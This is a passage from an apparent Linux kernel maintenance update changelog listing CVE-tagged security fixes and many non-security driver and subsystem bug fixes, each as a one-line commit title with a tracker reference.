- CVE-2025-68378: bpf: Refactor stack map trace depth calculation into helper function (bsc#1255614).
- CVE-2025-68379: RDMA/rxe: Fix null deref on srq->rq.queue after resize failure (bsc#1255695).
- CVE-2025-68727: ntfs3: Fix uninit buffer allocated by __getname() (bsc#1255568).
- CVE-2025-68728: ntfs3: fix uninit memory after failed mi_read in mi_format_new (bsc#1255539).
- CVE-2025-68733: smack: fix bug: unprivileged task can create labels (bsc#1255615).
- CVE-2025-68736: landlock: Fix handling of disconnected directories (bsc#1255698).
- CVE-2025-68742: bpf: Improve program stats run-time calculation (bsc#1255707).
- CVE-2025-68744: bpf: Free special fields when update [lru_,]percpu_hash maps (bsc#1255709).
- CVE-2025-68764: NFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags (bsc#1255930).
- CVE-2025-68768: inet: frags: add inet_frag_queue_flush() (bsc#1256579).
- CVE-2025-68770: bnxt_en: Fix XDP_TX path (bsc#1256584).
- CVE-2025-68771: ocfs2: fix kernel BUG in ocfs2_find_victim_chain (bsc#1256582).
- CVE-2025-68775: net/handshake: duplicate handshake cancellations leak socket (bsc#1256665).
- CVE-2025-68776: net/hsr: fix NULL pointer dereference in prp_get_untagged_frame() (bsc#1256659).
- CVE-2025-68778: btrfs: don't log conflicting inode if it's a dir moved in the current transaction (bsc#1256683).
- CVE-2025-68785: net: openvswitch: fix middle attribute validation in push_nsh() action (bsc#1256640).
- CVE-2025-68788: fsnotify: do not generate ACCESS/MODIFY events on child for special files (bsc#1256638).
- CVE-2025-68795: ethtool: Avoid overflowing userspace buffer on stats query (bsc#1256688).
- CVE-2025-68798: perf/x86/amd: Check event before enable to avoid GPF (bsc#1256689).
- CVE-2025-68800: mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats (bsc#1256646).
- CVE-2025-68801: mlxsw: spectrum_router: Fix neighbour use-after-free (bsc#1256653).
- CVE-2025-68803: nfsd: set security label during create operations (bsc#1256770).
- CVE-2025-68810: KVM: Disallow toggling KVM_MEM_GUEST_MEMFD on an existing memslot (bsc#1256679).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256641).
- CVE-2025-68814: io_uring: fix filename leak in __io_openat_prep() (bsc#1256651).
- CVE-2025-68815: net/sched: ets: Remove drr class from the active list if it changes to strict (bsc#1256680).
- CVE-2025-68816: net/mlx5: fw_tracer, Validate format string parameters (bsc#1256674).
- CVE-2025-68820: ext4: xattr: fix null pointer deref in ext4_raw_inode() (bsc#1256754).
- CVE-2025-71064: net: hns3: using the num_tqps in the vf driver to apply for resources (bsc#1256654).
- CVE-2025-71066: net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change (bsc#1256645).
- CVE-2025-71071: iommu/mediatek: fix use-after-free on probe deferral (bsc#1256802).
- CVE-2025-71077: tpm: Cap the number of PCR banks (bsc#1256613).
- CVE-2025-71084: RDMA/cm: Fix leaking the multicast GID table reference (bsc#1256622).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256623).
- CVE-2025-71087: iavf: fix off-by-one issues in iavf_config_rss_reg() (bsc#1256628).
- CVE-2025-71088: mptcp: fallback earlier on simult connection (bsc#1256630).
- CVE-2025-71089: iommu: disable SVA when CONFIG_X86 is set (bsc#1256612).
- CVE-2025-71091: team: fix check for port enabled in team_queue_override_port_prio_changed() (bsc#1256773).
- CVE-2025-71093: e1000: fix OOB in e1000_tbi_should_accept() (bsc#1256777).
- CVE-2025-71094: net: usb: asix: ax88772: Increase phy_name size (bsc#1256597).
- CVE-2025-71095: net: stmmac: fix the crash issue for zero copy XDP_TX action (bsc#1256605).
- CVE-2025-71096: RDMA/core: Check for the presence of LS_NLA_TYPE_DGID correctly (bsc#1256606).
- CVE-2025-71097: ipv4: Fix reference count leak when using error routes with nexthop objects (bsc#1256607).
- CVE-2025-71104: KVM: x86: Fix VM hard lockup after prolonged inactivity with periodic HV timer (bsc#1256708).
- CVE-2025-71112: net: hns3: add VLAN id validation before using (bsc#1256726).
- CVE-2025-71113: crypto: af_alg - zero initialize memory allocated via sock_kmalloc (bsc#1256716).
- CVE-2025-71116: libceph: make decode_pool() more resilient against corrupted osdmaps (bsc#1256744).
- CVE-2025-71120: SUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf (bsc#1256779).
- CVE-2025-71123: ext4: fix string copying in parse_apply_sb_mount_options() (bsc#1256757).
- CVE-2025-71126: mptcp: reset fallback status gracefully at disconnect() time (bsc#1256755).
- CVE-2025-71133: RDMA/irdma: avoid invalid read in irdma_net_event (bsc#1256733).
- CVE-2025-71135: md/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt() (bsc#1256761).
- CVE-2025-71137: octeontx2-pf: fix "UBSAN: shift-out-of-bounds error" (bsc#1256760).
- CVE-2025-71148: net/handshake: restore destructor on submit failure (bsc#1257159).
- CVE-2025-71149: io_uring/poll: correctly handle io_poll_add() return value on update (bsc#1257164).
- CVE-2025-71184: btrfs: fix NULL dereference on root when tracing inode eviction (bsc#1257635).
- CVE-2025-71194: btrfs: fix deadlock in wait_current_trans() due to ignored transaction type (bsc#1257687).
- CVE-2025-71225: md: suspend array while updating raid_disks via sysfs (bsc#1258411).
- CVE-2026-22976: net/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset (bsc#1257035).
- CVE-2026-22977: net: sock: fix hardened usercopy panic in sock_recv_errqueue (bsc#1257053).
- CVE-2026-22979: net: fix memory leak in skb_segment_list for GRO packets (bsc#1257228).
- CVE-2026-22982: net: mscc: ocelot: Fix crash when adding interface under a lag (bsc#1257179).
- CVE-2026-22984: libceph: prevent potential out-of-bounds reads in handle_auth_done() (bsc#1257217).
- CVE-2026-22990: libceph: replace overzealous BUG_ON in osdmap_apply_incremental() (bsc#1257221).
- CVE-2026-22991: libceph: make free_choose_arg_map() resilient to partial allocation (bsc#1257220).
- CVE-2026-22992: libceph: return the handler error from mon_handle_auth_done() (bsc#1257218).
- CVE-2026-22996: net/mlx5e: Don't store mlx5e_priv in mlx5e_dev devlink priv.
- CVE-2026-22998: nvme-tcp: fix NULL pointer dereferences in nvmet_tcp_build_pdu_iovec (bsc#1257209).
- CVE-2026-22999: net/sched: sch_qfq: do not free existing class in qfq_change_class() (bsc#1257236).
- CVE-2026-23000: net/mlx5e: Fix crash on profile change rollback failure (bsc#1257234).
- CVE-2026-23001: macvlan: Use 'hash' iterators to simplify code (bsc#1257232).
- CVE-2026-23003: geneve: Fix incorrect inner network header offset when innerprotoinherit is set (bsc#1257246).
- CVE-2026-23004: dst: fix races in rt6_uncached_list_del() and rt_del_uncached_list() (bsc#1257231).
- CVE-2026-23005: x86/fpu: Clear XSTATE_BV in guest XSAVE state whenever XFD[i]=1 (bsc#1257245).
- CVE-2026-23010: ipv6: Fix use-after-free in inet6_addr_del() (bsc#1257332).
- CVE-2026-23011: ipv4: ip_gre: make ipgre_header() robust (bsc#1257207).
- CVE-2026-23017: idpf: fix error handling in the init_task on load (bsc#1257552).
- CVE-2026-23035: net/mlx5e: Pass netdev to mlx5e_destroy_netdev instead of priv (bsc#1257559).
- CVE-2026-23053: NFS: Fix a deadlock involving nfs_release_folio() (bsc#1257718).
- CVE-2026-23057: vsock/virtio: Coalesce only linear skb (bsc#1257740).
- CVE-2026-23060: crypto: authencesn - reject too-short AAD (assoclen<8) to match ESP/ESN spec (bsc#1257735).
- CVE-2026-23064: net/sched: act_ife: avoid possible NULL deref (bsc#1257765).
- CVE-2026-23074: net/sched: Enforce that teql can only be used as root qdisc (bsc#1257749).
- CVE-2026-23083: fou: Don't allow 0 for FOU_ATTR_IPPROTO (bsc#1257745).
- CVE-2026-23084: be2net: Fix NULL pointer dereference in be_cmd_get_mac_from_list (bsc#1257830).
- CVE-2026-23085: irqchip/gic-v3-its: Avoid truncating memory addresses (bsc#1257758).
- CVE-2026-23086: vsock/virtio: cap TX credit to local buffer size (bsc#1257757).
- CVE-2026-23089: ALSA: usb-audio: Fix use-after-free in snd_usb_mixer_free() (bsc#1257790).
- CVE-2026-23095: gue: Fix skb memleak with inner IP protocol 0 (bsc#1257808).
- CVE-2026-23099: bonding: limit BOND_MODE_8023AD to Ethernet devices (bsc#1257816).
- CVE-2026-23102: arm64/fpsimd: signal: Mandate SVE payload for streaming-mode state (bsc#1257772).
- CVE-2026-23104: ice: fix devlink reload call trace (bsc#1257763).
- CVE-2026-23105: net/sched: qfq: Use cl_is_active to determine whether class is active in qfq_rm_from_ag (bsc#1257775).
- CVE-2026-23107: arm64/fpsimd: signal: Allocate SSVE storage when restoring ZA (bsc#1257762).
- CVE-2026-23110: scsi: core: Wake up the error handler when final completions race against each other (bsc#1257761).
- CVE-2026-23111: netfilter: nf_tables: fix inverted genmask check in nft_map_catchall_activate() (bsc#1258181).
- CVE-2026-23112: nvmet-tcp: add bounds checks in nvmet_tcp_build_pdu_iovec (bsc#1258184).
- CVE-2026-23113: io_uring/io-wq: check IO_WQ_BIT_EXIT inside work run loop (bsc#1258278).
- CVE-2026-23116: pmdomain: imx8m-blk-ctrl: Remove separate rst and clk mask for 8mq vpu (bsc#1258277).
- CVE-2026-23119: bonding: provide a net pointer to __skb_flow_dissect() (bsc#1258273).
- CVE-2026-23139: netfilter: nf_conncount: update last_gc only when GC has been performed (bsc#1258304).
- CVE-2026-23141: btrfs: send: check for inline extents in range_is_hole_in_parent() (bsc#1258377).
- CVE-2026-23166: ice: Fix NULL pointer dereference in ice_vsi_set_napi_queues (bsc#1258272).
- CVE-2026-23171: net: bonding: update the slave array for broadcast mode (bsc#1258349).
- CVE-2026-23173: net/mlx5e: TC, delete flows only for existing peers (bsc#1258520).
- CVE-2026-23179: nvmet-tcp: fixup hang in nvmet_tcp_listen_data_ready() (bsc#1258394).
- CVE-2026-23191: ALSA: aloop: Fix racy access at PCM trigger (bsc#1258395).
- CVE-2026-23198: KVM: Don't clobber irqfd routing type when deassigning irqfd (bsc#1258321).
- CVE-2026-23208: ALSA: usb-audio: Prevent excessive number of frames (bsc#1258468).
- CVE-2026-23209: macvlan: fix error recovery in macvlan_common_newlink() (bsc#1258518).
- CVE-2026-23213: drm/amd/pm: Disable MMIO access during SMU Mode 1 reset (bsc#1258465).
- CVE-2026-23214: btrfs: reject new transactions if the fs is fully read-only (bsc#1258464).
The following non-security bugs were fixed:
- ACPI: CPPC: Fix missing PCC check for guaranteed_perf (git-fixes).
- ACPI: CPPC: Fix remaining for_each_possible_cpu() to use online CPUs (git-fixes).
- ACPI: PCC: Fix race condition by removing static qualifier (git-fixes).
- ACPI: PM: Add unused power resource quirk for THUNDEROBOT ZERO (git-fixes).
- ACPI: processor: Fix NULL-pointer dereference in acpi_processor_errata_piix4() (stable-fixes).
- ACPI: processor_core: fix map_x2apic_id for amd-pstate on am4 (git-fixes).
- ACPI: property: Fix fwnode refcount leak in acpi_fwnode_graph_parse_endpoint() (git-fixes).
- ACPI: property: Use ACPI functions in acpi_graph_get_next_endpoint() only (stable-fixes).
- ACPICA: Abort AML bytecode execution when executing AML_FATAL_OP (stable-fixes).
- ACPICA: Avoid walking the Namespace if start_node is NULL (stable-fixes).
- ACPICA: Fix NULL pointer dereference in acpi_ev_address_space_dispatch() (git-fixes).
- ALSA: ac97: fix a double free in snd_ac97_controller_register() (git-fixes).
- ALSA: ctxfi: Fix potential OOB access in audio mixer handling (stable-fixes).
- ALSA: dice: fix buffer overflow in detect_stream_formats() (git-fixes).
- ALSA: firewire-motu: add bounds check in put_user loop for DSP events (git-fixes).
- ALSA: firewire-motu: fix buffer overflow in hwdep read for DSP events (git-fixes).
- ALSA: hda/conexant: Add headset mic fix for MECHREVO Wujie 15X Pro (stable-fixes).
- ALSA: hda/realtek - fixed speaker no sound (stable-fixes).
- ALSA: hda/realtek: Add quirk for Inspur S14-G1 (stable-fixes).
- ALSA: hda/realtek: Fix headset mic for TongFang X6AR55xU (stable-fixes).
- ALSA: hda/realtek: Really fix headset mic for TongFang X6AR55xU (git-fixes).
- ALSA: hda/realtek: add HP Laptop 15s-eq1xxx mute LED quirk (stable-fixes).
- ALSA: hda/realtek: fix right sounds and mute/micmute LEDs for HP machine (stable-fixes).
- ALSA: hda: cs35l41: Fix NULL pointer dereference in cs35l41_hda_read_acpi() (git-fixes).
- ALSA: pcmcia: Fix resource leak in snd_pdacf_probe error path (git-fixes).
- ALSA: scarlett2: Fix buffer overflow in config retrieval (git-fixes).
- ALSA: uapi: Fix typo in asound.h comment (git-fixes).
- ALSA: usb-audio: Add DSD quirk for LEAK Stereo 230 (stable-fixes).
- ALSA: usb-audio: Add iface reset and delay quirk for AB13X USB Audio (stable-fixes).
- ALSA: usb-audio: Add native DSD quirks for PureAudio DAC series (stable-fixes).
- ALSA: usb-audio: Add sanity check for OOB writes at silencing (stable-fixes).
- ALSA: usb-audio: Avoid implicit feedback mode on DIYINHK USB Audio 2.0 (stable-fixes).
- ALSA: usb-audio: Cap the packet size pre-calculations (git-fixes).
- ALSA: usb-audio: Check max frame size for implicit feedback mode, too (stable-fixes).
- ALSA: usb-audio: Fix use-after-free in snd_usb_mixer_free() (git-fixes).
- ALSA: usb-audio: Remove VALIDATE_RATES quirk for Focusrite devices (git-fixes).
- ALSA: usb-audio: Update for native DSD support quirks (stable-fixes).
- ALSA: usb-audio: Update the number of packets properly at receiving (stable-fixes).
- ALSA: usb-audio: Use correct version for UAC3 header validation (git-fixes).
- ALSA: usb-audio: Use inclusive terms (git-fixes).
- ALSA: usb-audio: fix broken logic in snd_audigy2nx_led_update() (git-fixes).
- ALSA: usb-mixer: us16x08: validate meter packet indices (git-fixes).
- ALSA: usb: Increase volume range that triggers a warning (git-fixes).
- ALSA: vxpocket: Fix resource leak in vxpocket_probe error path (git-fixes).
- APEI/GHES: ensure that won't go past CPER allocated record (stable-fixes).
- ASoC: Intel: catpt: Fix error path in hw_params() (git-fixes).
- ASoC: Intel: sof_es8336: Add DMI quirk for Huawei BOD-WXX9 (stable-fixes).
- ASoC: Intel: sof_es8336: fix headphone GPIO logic inversion (git-fixes).
- ASoC: SOF: ipc4-control: If there is no data do not send bytes update (git-fixes).
- ASoC: SOF: ipc4-control: Keep the payload size up to date (git-fixes).
- ASoC: SOF: ipc4-control: Use the correct size for scontrol->ipc_control_data (git-fixes).
- ASoC: SOF: ipc4-topology: Correct the allocation size for bytes controls (git-fixes).
- ASoC: ak4458: Disable regulator when error happens (git-fixes).
- ASoC: ak5558: Disable regulator when error happens (git-fixes).
- ASoC: amd: drop unused Kconfig symbols (git-fixes).
- ASoC: amd: fix memory leak in acp3x pdm dma ops (git-fixes).
- ASoC: amd: yc: Add ASUS ExpertBook PM1503CDA to quirks list (stable-fixes).
- ASoC: amd: yc: Add DMI quirk for ASUS Vivobook Pro 15X M6501RR (stable-fixes).
- ASoC: amd: yc: Add DMI quirk for Acer TravelMate P216-41-TCO (stable-fixes).
- ASoC: amd: yc: Add quirk for HP 200 G2a 16 (stable-fixes).
- ASoC: amd: yc: Add quirk for Honor MagicBook X16 2025 (stable-fixes).
- ASoC: amd: yc: Fix microphone on ASUS M6500RE (stable-fixes).
- ASoC: bcm: bcm63xx-pcm-whistler: Check return value of of_dma_configure() (git-fixes).
- ASoC: codecs: max98390: Check return value of devm_gpiod_get_optional() in max98390_i2c_probe() (stable-fixes).
- ASoC: codecs: wcd938x: fix OF node leaks on probe failure (git-fixes).
- ASoC: codecs: wsa881x: Drop unused version readout (stable-fixes).
- ASoC: codecs: wsa881x: fix unnecessary initialisation (git-fixes).
- ASoC: codecs: wsa883x: fix unnecessary initialisation (git-fixes).
- ASoC: codecs: wsa884x: fix codec initialisation (git-fixes).
- ASoC: cs35l45: Corrects ASP_TX5 DAPM widget channel (stable-fixes).
- ASoC: davinci-evm: Fix reference leak in davinci_evm_probe (stable-fixes).
- ASoC: fsl: imx-card: Do not force slot width to sample width (git-fixes).
- ASoC: fsl_sai: Add missing registers to cache default (stable-fixes).
- ASoC: fsl_xcvr: clear the channel status control memory (git-fixes).
- ASoC: nau8821: Avoid unnecessary blocking in IRQ handler (stable-fixes).
- ASoC: nau8821: Cancel delayed work on component remove (git-fixes).
- ASoC: nau8821: Cancel pending work before suspend (git-fixes).
- ASoC: nau8821: Consistently clear interrupts before unmasking (git-fixes).
- ASoC: nau8821: Fixup nau8821_enable_jack_detect() (git-fixes).
- ASoC: pxa: drop unused Kconfig symbol (git-fixes).
- ASoC: qcom: q6adm: the the copp device only during last instance (git-fixes).
- ASoC: qcom: q6apm-dai: set flags to reflect correct operation of appl_ptr (git-fixes).
- ASoC: qcom: q6asm-dai: perform correct state check before closing (git-fixes).
- ASoC: qcom: qdsp6: q6asm-dai: set 10 ms period and buffer alignment (git-fixes).
- ASoC: rockchip: i2s-tdm: Use param rate if not provided by set_sysclk (git-fixes).
- ASoC: stm32: sai: fix OF node leak on probe (git-fixes).
- ASoC: stm32: sai: fix clk prepare imbalance on probe failure (git-fixes).
- ASoC: stm32: sai: fix device leak on probe (git-fixes).
- ASoC: sun4i-spdif: Add missing kerneldoc fields for sun4i_spdif_quirks (git-fixes).
- ASoC: sunxi: sun50i-dmic: Add missing check for devm_regmap_init_mmio (stable-fixes).
- ASoC: tlv320adcx140: Propagate error codes during probe (stable-fixes).
- ASoC: tlv320adcx140: fix null pointer (git-fixes).
- ASoC: tlv320adcx140: fix word length (git-fixes).
- ASoC: wm8962: Add WM8962_ADC_MONOMIX to "3D Coefficients" mask (stable-fixes).
- ASoC: wm8962: Do not report a microphone if it's shorted to ground on plug (stable-fixes).
- Add dtb-spacemit SpacemiT boards include MilkV-Jupiter, Banana Pi F3 and Orange Pi RV2.
- Bluetooth: HCI: Fix tracking of advertisement set/instance 0x00 (git-fixes).
- Bluetooth: L2CAP: Fix invalid response to L2CAP_ECRED_RECONF_REQ (git-fixes).
- Bluetooth: L2CAP: Fix missing key size check for L2CAP_LE_CONN_REQ (git-fixes).
- Bluetooth: L2CAP: Fix not checking output MTU is acceptable on L2CAP_ECRED_CONN_REQ (git-fixes).
- Bluetooth: L2CAP: Fix response to L2CAP_ECRED_CONN_REQ (git-fixes).
- Bluetooth: MGMT: Fix memory leak in set_ssp_complete (git-fixes).
- Bluetooth: SMP: Fix not generating mackey and ltk when repairing (git-fixes).
- Bluetooth: btrtl: Avoid loading the config file on security chips (stable-fixes).
- Bluetooth: btusb: Add USB ID 7392:e611 for Edimax EW-7611UXB (stable-fixes).
- Bluetooth: btusb: Add device ID for Realtek RTL8761BU (stable-fixes).
- Bluetooth: btusb: Add new VID/PID 13d3/3533 for RTL8821CE (stable-fixes).
- Bluetooth: btusb: Add new VID/PID 2b89/6275 for RTL8761BUV (stable-fixes).
- Bluetooth: btusb: Add new VID/PID for RTL8852CE (stable-fixes).
- Bluetooth: btusb: revert use of devm_kzalloc in btusb (git-fixes).
- Bluetooth: hci_conn: Set link_policy on incoming ACL connections (stable-fixes).
- Bluetooth: hci_conn: use mod_delayed_work for active mode timeout (stable-fixes).
- Bluetooth: hci_qca: Cleanup on all setup failures (git-fixes).
- Bluetooth: hci_sock: Prevent race in socket write iter and sock bind (git-fixes).
- Bluetooth: hci_uart: fix null-ptr-deref in hci_uart_write_work (git-fixes).
- Documentation/kernel-parameters: fix typo in retbleed= kernel parameter description (git-fixes).
- Documentation: PCI: endpoint: Fix ntb/vntb copy & paste errors (git-fixes).
- Documentation: hid-alps: Fix packet format section headings (git-fixes).
- Documentation: mailbox: mbox_chan_ops.flush() is optional (git-fixes).
- Documentation: parport-lowlevel: Separate function listing code blocks (git-fixes).
- HID: Apply quirk HID_QUIRK_ALWAYS_POLL to Edifier QR30 (2d99:a101) (stable-fixes).
- HID: apple: Add "SONiX KN85 Keyboard" to the list of non-apple keyboards (stable-fixes).
- HID: apple: Add SONiX AK870 PRO to non_apple_keyboards quirk list (stable-fixes).
- HID: elecom: Add support for ELECOM HUGE Plus M-HT1MRBK (stable-fixes).
- HID: elecom: Add support for ELECOM M-XT3URBK (018F) (stable-fixes).
- HID: hid-input: Extend Elan ignore battery quirk to USB (stable-fixes).
- HID: hid-pl: handle probe errors (git-fixes).
- HID: i2c-hid: fix potential buffer overflow in i2c_hid_get_report() (stable-fixes).
- HID: input: map HID_GD_Z to ABS_DISTANCE for stylus/pen (stable-fixes).
- HID: intel-ish-hid: Reset enum_devices_done before enumeration (stable-fixes).
- HID: intel-ish-hid: Update ishtp bus match to support device ID table (stable-fixes).
- HID: logitech-dj: Remove duplicate error logging (git-fixes).
- HID: logitech-hidpp: Check maxfield in hidpp_get_report_length() (stable-fixes).
- HID: logitech-hidpp: Do not assume FAP in hidpp_send_message_sync() (git-fixes).
- HID: magicmouse: Do not crash on missing msc->input (stable-fixes).
- HID: multitouch: add MT_QUIRK_STICKY_FINGERS to MT_CLS_VTL (stable-fixes).
- HID: multitouch: add eGalaxTouch EXC3188 support (stable-fixes).
- HID: playstation: Add missing check for input_ff_create_memless (git-fixes).
- HID: playstation: Center initial joystick axes to prevent spurious events (stable-fixes).
- HID: prodikeys: Check presence of pm->input_ep82 (stable-fixes).
- HID: quirks: Add another Chicony HP 5MP Cameras to hid_ignore_list (stable-fixes).
- HID: quirks: work around VID/PID conflict for appledisplay (git-fixes).
- HID: usbhid: paper over wrong bNumDescriptor field (stable-fixes).
- Input: atkbd - skip deactivate for HONOR FMB-P's internal keyboard (git-fixes).
- Input: cros_ec_keyb - fix an invalid memory access (stable-fixes).
- Input: goodix - add support for ACPI ID GDIX1003 (stable-fixes).
- Input: goodix - add support for ACPI ID GDX9110 (stable-fixes).
- Input: i8042 - add TUXEDO InfinityBook Max Gen10 AMD to i8042 quirk table (stable-fixes).
- Input: i8042 - add quirk for ASUS Zenbook UX425QA_UM425QA (stable-fixes).
- Input: i8042 - add quirks for MECHREVO Wujie 15X Pro (stable-fixes).
- Input: stmfts - correct wording for the warning message (git-fixes).
- Input: stmfts - make comments correct (git-fixes).
- Input: ti_am335x_tsc - fix off-by-one error in wire_order validation (git-fixes).
- KEYS: trusted: Fix a memory leak in tpm2_load_cmd (git-fixes).
- KEYS: trusted_tpm1: Compare HMAC values in constant time (git-fixes).
- Move upstreamed SCSI patches into sorted section
- Move upstreamed ath12k patch into sorted section
- Move upstreamed mm and SCSI patches into sorted section
- NTB: ntb_transport: Fix too small buffer for debugfs_name (git-fixes).
- PCI/ACPI: Restrict program_hpx_type2() to AER bits (git-fixes).
- PCI/IOV: Fix race between SR-IOV enable/disable and hotplug (git-fixes).
- PCI/MSI: Unmap MSI-X region on error (stable-fixes).
- PCI/P2PDMA: Release per-CPU pgmap ref when vm_insert_page() fails (git-fixes).
- PCI/PM: Avoid redundant delays on D3hot->D3cold (git-fixes).
- PCI/PM: Reinstate clearing state_saved in legacy and !PM codepaths (git-fixes).
- PCI/portdrv: Fix potential resource leak (git-fixes).
- PCI: Add ACS quirk for Pericom PI7C9X2G404 switches [12d8:b404] (git-fixes).
- PCI: Add ACS quirk for Qualcomm Hamoa & Glymur (stable-fixes).
- PCI: Add PCIE_MSG_CODE_ASSERT_INTx message macros (stable-fixes).
- PCI: Add defines for bridge window indexing (stable-fixes).
- PCI: Correct PCI_CAP_EXP_ENDPOINT_SIZEOF_V2 value (git-fixes).
- PCI: Do not attempt to set ExtTag for VFs (git-fixes).
- PCI: Enable ACS after configuring IOMMU for OF platforms (stable-fixes).
- PCI: Fix pci_slot_lock () device locking (stable-fixes).
- PCI: Fix pci_slot_trylock() error handling (git-fixes).
- PCI: Initialize RCB from pci_configure_device() (git-fixes).
- PCI: Log bridge info when first enumerating bridge (stable-fixes).
- PCI: Log bridge windows conditionally (stable-fixes).
- PCI: Mark 3ware-9650SA Root Port Extended Tags as broken (git-fixes).
- PCI: Mark ASM1164 SATA controller to avoid bus reset (stable-fixes).
- PCI: Mark Nvidia GB10 to avoid bus reset (stable-fixes).
- PCI: Move pci_read_bridge_windows() below individual window accessors (stable-fixes).
- PCI: Supply bridge device, not secondary bus, to read window details (stable-fixes).
- PCI: dw-rockchip: Disable BAR 0 and BAR 1 for Root Port (stable-fixes).
- PCI: dwc: Fix wrong PORT_LOGIC_LTSSM_STATE_MASK definition (git-fixes).
- PCI: endpoint: Fix swapped parameters in pci_{primary/secondary}_epc_epf_unlink() functions (git-fixes).
- PCI: keystone: Exit ks_pcie_probe() for invalid mode (git-fixes).
- PCI: mediatek: Fix IRQ domain leak when MSI allocation fails (git-fixes).
- PCI: rcar-gen2: Drop ARM dependency from PCI_RCAR_GEN2 (git-fixes).
- PM: runtime: Do not clear needs_force_resume with enabled runtime PM (git-fixes).
- PM: sleep: wakeirq: Update outdated documentation comments (git-fixes).
- PM: sleep: wakeirq: harden dev_pm_clear_wake_irq() against races (git-fixes).
- PM: wakeup: Handle empty list in wakeup_sources_walk_start() (git-fixes).
- USB: Fix descriptor count when handling invalid MBIM extended descriptor (git-fixes).
- USB: OHCI/UHCI: Add soft dependencies on ehci_platform (stable-fixes).
- USB: lpc32xx_udc: Fix error handling in probe (git-fixes).
- USB: serial: belkin_sa: fix TIOCMBIS and TIOCMBIC (git-fixes).
- USB: serial: ftdi_sio: add support for PICAXE AXE027 cable (stable-fixes).
- USB: serial: ftdi_sio: add support for u-blox EVK-M101 (stable-fixes).
- USB: serial: ftdi_sio: match on interface number for jtag (stable-fixes).
- USB: serial: kobil_sct: fix TIOCMBIS and TIOCMBIC (git-fixes).
- USB: serial: option: add Foxconn T99W760 (stable-fixes).
- USB: serial: option: add Quectel RG255C (stable-fixes).
- USB: serial: option: add Telit Cinterion FE910C04 new compositions (stable-fixes).
- USB: serial: option: add Telit FN920C04 ECM compositions (stable-fixes).
- USB: serial: option: add Telit FN920C04 RNDIS compositions (stable-fixes).
- USB: serial: option: add Telit LE910 MBIM composition (stable-fixes).
- USB: serial: option: add UNISOC UIS7720 (stable-fixes).
- USB: serial: option: add support for Rolling RW101R-GL (stable-fixes).
- USB: serial: option: move Telit 0x10c7 composition in the right place (stable-fixes).
- USB: storage: Remove subclass and protocol overrides from Novatek quirk (git-fixes).
- Update config files: disable CONFIG_DEVPORT for arm64 (bsc#1256792)
- Workaround for hybrid git workflow in SLFO 1.0/1.1
- arm64: zynqmp: Fix usb node drive strength and slew rate (git-fixes)
- arm64: zynqmp: Revert usb node drive strength and slew rate for (git-fixes)
- ata: libata: Add cpr_log to ata_dev_print_features() early return (git-fixes).
- ata: libata: avoid long timeouts on hot-unplugged SATA DAS (stable-fixes).
- ata: pata_ftide010: Fix some DMA timings (git-fixes).
- atm/fore200e: Fix possible data race in fore200e_open() (git-fixes).
- atm: Fix dma_free_coherent() size (git-fixes).
- atm: fore200e: fix use-after-free in tasklets during device removal (git-fixes).
- atm: idt77252: Add missing `dma_map_error()` (stable-fixes).
- auxdisplay: arm-charlcd: fix release_mem_region() size (git-fixes).
- backlight: led-bl: Add devlink to supplier LEDs (git-fixes).
- backlight: lp855x: Fix lp855x.h kernel-doc warnings (git-fixes).
- backlight: qcom-wled: Change PM8950 WLED configurations (git-fixes).
- backlight: qcom-wled: Support ovp values for PMI8994 (git-fixes).
- bonding: only set speed/duplex to unknown, if getting speed failed (bsc#1253691).
- bpf/selftests: test_select_reuseport_kern: Remove unused header (bsc#1257603).
- bpf: Do not let BPF test infra emit invalid GSO types to stack (bsc#1255569).
- bpf: Reject bpf_timer for PREEMPT_RT (git-fixes).
- broadcom: b44: prevent uninitialized value usage (git-fixes).
- bs-upload-kernel: Fix cve branch uploads
- btrfs: do not strictly require dirty metadata threshold for metadata writepages (stable-fixes).
- btrfs: make sure extent and csum paths are always released in scrub_raid56_parity_stripe() (git-fixes).
- btrfs: scrub: always update btrfs_scrub_progress::last_physical (git-fixes).
- bus: fsl-mc: Replace snprintf and sprintf with sysfs_emit in sysfs show functions (stable-fixes).
- bus: fsl-mc: fix an error handling in fsl_mc_device_add() (git-fixes).
- bus: fsl-mc: fix use-after-free in driver_override_show() (git-fixes).
- can: ctucanfd: fix SSP_SRC in cases when bit-rate is higher than 1 MBit (git-fixes).
- can: ems_usb: ems_usb_read_bulk_callback(): fix URB memory leak (git-fixes).
- can: etas_es58x: allow partial RX URB allocation to succeed (git-fixes).
- can: gs_usb: gs_can_open(): fix error handling (git-fixes).
- can: gs_usb: gs_usb_receive_bulk_callback(): fix error message (git-fixes).
- can: gs_usb: gs_usb_receive_bulk_callback(): unanchor URL on usb_submit_urb() error (git-fixes).
- can: gs_usb: gs_usb_xmit_callback(): fix handling of failed transmitted URBs (git-fixes).
- can: j1939: make j1939_session_activate() fail if device is no longer registered (stable-fixes).
- can: j1939: make j1939_sk_bind() fail if device is no longer registered (git-fixes).
- can: kvaser_usb: kvaser_usb_read_bulk_callback(): fix URB memory leak (git-fixes).
- can: kvaser_usb: leaf: Fix potential infinite loop in command parsers (git-fixes).
- can: mcba_usb: mcba_usb_read_bulk_callback(): fix URB memory leak (git-fixes).
- can: sja1000: fix max irq loop handling (git-fixes).
- can: sun4i_can: sun4i_can_interrupt(): fix max irq loop handling (git-fixes).
- can: usb_8dev: usb_8dev_read_bulk_callback(): fix URB memory leak (git-fixes).
- char: applicom: fix NULL pointer dereference in ac_ioctl (stable-fixes).
- char: tpm: cr50: Remove IRQF_ONESHOT (stable-fixes).
- cifs: Fix copy offload to flush destination region (bsc#1252511).
- cifs: Fix flushing, invalidation and file size with copy_file_range() (bsc#1252511).
- cifs: Fix uncached read into ITER_KVEC iterator (bsc#1245449).
- cifs: add new field to track the last access time of cfid (git-fixes).
- cifs: add xid to query server interface call (git-fixes).
- cifs: after disabling multichannel, mark tcon for reconnect (git-fixes).
- cifs: avoid redundant calls to disable multichannel (git-fixes).
- cifs: cifs_pick_channel should try selecting active channels (git-fixes).
- cifs: deal with the channel loading lag while picking channels (git-fixes).
